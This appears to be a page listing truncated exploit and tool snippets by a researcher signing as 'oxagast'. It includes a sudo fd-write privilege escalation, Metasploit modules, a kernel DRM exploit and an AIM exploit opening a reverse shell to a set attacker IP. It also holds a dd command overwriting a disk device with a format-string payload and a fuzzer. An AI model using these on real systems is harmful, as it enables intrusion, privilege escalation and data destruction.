oxagast

root@debian-sid-testbed:/home/marshall/ansvif# useradd '#0'
root@debian-sid-testbed:/home/marshall/ansvif# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin

oxagast

# oxagast / Marshall Whittaker
#
# The echo line uses sudoers file format to allow for everyone to 
# use the root account and writes it to proc/23423/fd/3 (where
# the number is sudo's process.  If you have write access to file
# descriptor 3 it gives you root!
# Cavets: sudo must be running asking for a password at the time.
#         you must have write permission to 3.
#
# Race condition between when getting the uid of sudo and the

oxagast

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/base/sessions/scriptable'
require 'msf/base'
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Report

oxagast

#!/bin/bash
#
# ./makeitrain.sh bitcoin-qt.crashdump.core
#   __ _  _  __   ___  __  ____ ____
#  /  ( \/ )/ _\ / __)/ _\/ ___(_  )
# (  O )  (/    ( (_ /    \___ \ )(
#  \__(_/\_\_/\_/\___\_/\_(____/(__)
#
# Donations:
# btc: 34fDhMUkvGVr1s2jQvhwmBfw1xqjstrLed

oxagast

#!/usr/bin/perl
use strict;
use Cwd qw();
my $path = Cwd::cwd();
if ( $path !~ m/metasploit/ ) {
    print("err: Your current working directory must be metasploit's.\n");
    exit(1);
}
print("autopreter by oxagast\n");
if ( $#ARGV < 1 ) {

oxagast

genisoimage -V "AAAAAAAA" -o dos.iso /etc/passwd && dd if=dos.iso | sed -e 's/AAAAAAAA/%n%n%n%n/g' | dd of=/dev/sdb1

oxagast

/*                                                           */
/* gcc drm_i915_ktsploit.c -o kt -ldrm -I/usr/include/libdrm */
/*             exploit by oxagast                            */
/*                                                           */
//Jun 17 01:22:05 likon kernel: [ 1788.600973] BUG: unable to handle kernel NULL pointer dereference at 0000000000000010
//Jun 17 01:22:05 likon kernel: [ 1788.600982] IP: __sg_alloc_table_from_pages+0xe4/0x1f0
//Jun 17 01:22:05 likon kernel: [ 1788.600984] PGD 0 P4D 0 
//Jun 17 01:22:05 likon kernel: [ 1788.600987] Oops: 0000 [#3] SMP PTI
//Jun 17 01:22:05 likon kernel: [ 1788.600988] Modules linked in: rfcomm appletalk ipx p8023 psnap p8022 llc pci_stub vboxpci(OE) vboxnetadp(OE) vboxnetflt(OE) vboxdrv(OE) snd_hrtimer ccm cmac bnep binfmt_misc arc4 iwlmvm mac80211 hid_multitouch hid_sensor_magn_3d hid_sensor_accel_3d hid_sensor_rotation hid_sensor_incl_3d hid_sensor_als ir_lirc_codec lirc_dev hid_sensor_gyro_3d rtl2832_sdr hid_sensor_trigger industrialio_t

oxagast

#!/bin/bash

### AOL Instant Messenger 8.0.1.5 (Jul 2013) Exploit Windows XP/7 tested and working.
### Leverages binary file planting to My Documents via AIMs advertisement code.
### Little social engineering built in using javascript to try to get them to run the AIM_Install.exe.
### Starts a reverse shell back to your handler on 192.168.2.5:443 by default.

### Marshall Whittaker

ATTACKER="192.168.2.10";

oxagast

#define __NULLHOLDER
#define __START
/*                             oxagast                          */
/*                  self output metamorphic c code              */
/* gcc myself.c -o me && cat myself.c >> me                     */
/* ./me && md5sum ./me && sleep 1 && ./me && md5sum ./me        */
/* d4c6f41bace586e876f31d8d5032bd2e  ./me                       */
/* 9c80c85a49721a1700e0ac2f594bbf86  ./me                       */
#include <stdio.h>
#include <stdlib.h>

oxagast

# bermise_fuzz
# oxagast

mupr="64";

syslog_crashes=$(grep "traps:\|segfault" /var/log/syslog -c);
binname="$1";
binshort=$(echo $binname | awk -F "/" '{print $NF}')
echo fuzzing $binname;
randchars=1;